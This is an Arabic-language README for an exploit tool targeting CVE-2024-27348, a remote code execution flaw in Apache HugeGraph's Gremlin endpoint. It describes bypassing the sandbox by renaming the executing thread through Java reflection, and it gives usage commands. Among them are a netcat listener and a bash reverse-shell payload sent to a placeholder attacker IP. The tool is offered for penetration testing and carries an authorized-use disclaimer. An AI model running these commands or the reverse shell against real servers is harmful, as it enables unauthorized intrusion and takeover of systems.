
استغلال PoC متقدم لـ CVE-2024-27348، يحقق RCE موثوقًا في Apache HugeGraph عبر تجاوز وضع الحماية وتنفيذ الأوامر غير الأعمى.
مستغل إثبات المفهوم (PoC) متقدم وموثوق للغاية لـ CVE-2024-27348 (ثغرة تنفيذ الأوامر عن بعد في Apache HugeGraph Server).
على عكس العديد من مستغلات PoC العامة التي تنفذ الأوامر بشكل أعمى أو تفشل في التعامل مع الحمولات المعقدة بسبب قيود Runtime.exec() في Java، تم تصميم هذا السكريبت لـ الموثوقية في سيناريوهات اختبار الاختراق الواقعية.
لأغراض التعليم والاختبار المصرح به فقط. تم توفير هذه الأداة لباحثي الأمن ومختبري الاختراق ومسؤولي الأنظمة للتحقق من الثغرة في بيئات مصرح بها. المؤلف غير مسؤول عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.
يحسّن هذا المستغل من مستغلات PoC العامة المبكرة من خلال معالجة ثلاث مشكلات حرجة:
gremlin-server-exec-* أو task-worker-*. تستخدم هذه الحمولة Java Reflection لإعادة تسمية مؤشر الترابط المنفذ ديناميكيًا إلى BypassThread قبل تشغيل الحمولة، متجنبة بذلك مدير الأمان بسلاسة.Runtime.getRuntime().exec(String)، الذي يكسر أوامر bash المعقدة (مثل الصدف العكسية) عند المسافات، يستخدم هذا المستغل ProcessBuilder مع List<String> منسقة بشكل صحيح. يسمح هذا بتنفيذ آمن للحمولات المعقدة مع علامات الاقتباس وإعادة التوجيه.InputStream الخاص بالعملية المنفذة باستخدام Scanner من Java ويعيد المخرجات الفعلية للأمر في استجابة HTTP بصيغة JSON. ترى بالضبط ما يراه الخادم.requestsقم بتثبيت التبعيات المطلوبة:
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
أمثلة
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# على جهازك المهاجم، ابدأ مستمعًا:
nc -lvnp 4444
# نفذ المستغل:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
يعرض خادم Apache HugeGraph نقطة نهاية Gremlin API (/gremlin) تتيح للمستخدمين إرسال نصوص Groovy. بسبب عدم كفاية صندوق الرمل في الإصدارات السابقة للتصحيح، يمكن لمهاجم غير مصادق تنفيذ أوامر نظام تشغيل عشوائية عبر Java Reflection.